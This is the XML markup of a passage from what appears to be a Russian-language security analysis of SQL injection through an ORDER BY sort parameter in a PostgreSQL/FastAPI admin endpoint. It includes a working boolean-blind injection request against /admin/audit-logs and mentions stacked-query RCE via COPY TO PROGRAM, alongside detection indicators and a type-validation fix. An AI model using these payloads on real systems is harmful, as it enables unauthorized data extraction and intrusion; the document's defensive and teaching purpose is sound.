        <w:t xml:space="preserve">Если application-роль имеет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RCE через COPY TO PROGRAM (см. 3.7.1). В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended-mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сервер отвечает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: cannot insert multiple commands into a prepared statement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Вариант C — expression-injection в integer-position (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /admin/audit-logs?sort_col=(CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%201%20ELSE%202%20END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col = "(CASE WHEN ... THEN 1 ELSE 2 END)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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ORDER BY (CASE WHEN ... THEN 1 ELSE 2 END) DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL принимает expression в ORDER BY-position — это валидно, как описано в 3.14.0 (ORDER BY column_number и ORDER BY expression — две стороны одного clause). Boolean-leak через row-order: если current_user superuser, sort идёт по колонке 1 (id); иначе — по колонке 2 (user_id). Атакующий сравнивает порядок rows в response — boolean confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта payload показывает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">граница между «column number» и «expression» в ORDER BY размыта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — integer literal и expression используют один и тот же AST-node. PostgreSQL различает их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только по pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: если node — integer constant ≤ select_list_size, это column reference; иначе — expression. Атакующий легко переходит границу через скобки.</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Variant A — определение select-list count → подготовка UNION-extraction. Variant B — RCE через stacked queries (требует privilege). Variant C — boolean-leak через row order, эскалация в 3.3 (boolean-blind extraction).</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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (нетипичные column numbers), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от endpoint-а где ожидается простой integer.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log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от того же IP — индикатор enumeration.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HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит non-numeric characters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В PostgreSQL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принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">либо integer literal (column reference) либо expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Парсер сначала смотрит на токен: если это integer literal в диапазоне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1..N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (где N = select_list_size), это column reference; иначе — expression. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">один AST-node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SortGroupClause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — с разными интерпретациями.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Документация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*"Each expression can be the name or ordinal number of an output column (SELECT list item)... A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be an arbitrary expression formed from input-column values."* Граница между column-number и expression — синтаксическая (integer literal vs expression), не семантическая.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому защита через «использую column number вместо имени» — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ложная защита</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: парсер всё равно примет expression в той же позиции, если synthetic-integer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1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) проходит. Реальная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">type-coerce на стороне application</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@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: int = Query(1, ge=1, le=5),    # ← int + range от 1 до len(select_list)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: Literal["ASC", "DESC"] = Query("DESC"),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 ORDER BY {sort_col} {direction} LIMIT 100")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ безопасно: sort_col гарантированно int 1..5, direction — Literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FastAPI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Query(ge=1, le=5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует, что parameter — integer в строго заданном диапазоне. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Literal["ASC", "DESC"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для direction — то же самое для строки. Эти два cast делают f-string в SQL безопасной — даже если query-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort_col=99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> придёт, FastAPI вернёт 422 ещё до маршрутизации в handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-канал (Variant A) не работает, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уже валидирован range-check на стороне application.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> syntax существует с SQL92).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любая роль с EXECUTE-доступом к эндпоинту. Для Variant B (RCE) — также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ИЛИ superuser у application-роли.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Драйвер для Variant B (stacked):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple-protocol режим.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user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или эквивалент) без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-cast + range-check, передаётся через f-string в SQL.</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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный SQL-синтаксис, используется в hand-written queries (особенно когда select-list expression сложное и неудобно повторять в ORDER BY). Примеры:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Legitimate: ORDER BY result of computed expression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT user_id, COUNT(*) AS event_count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY user_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 2 DESC;   -- сортировка по event_count, не повторяя выражение</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Legitimate в reporting tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT date_trunc('day', created_at), SUM(amount)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В application-коде ORDER BY column_number используется реже, чем column_name (typing-defensive разработчики предпочитают именованные ссылки), но REST-API с pagination + sort часто принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col=N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для compact URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
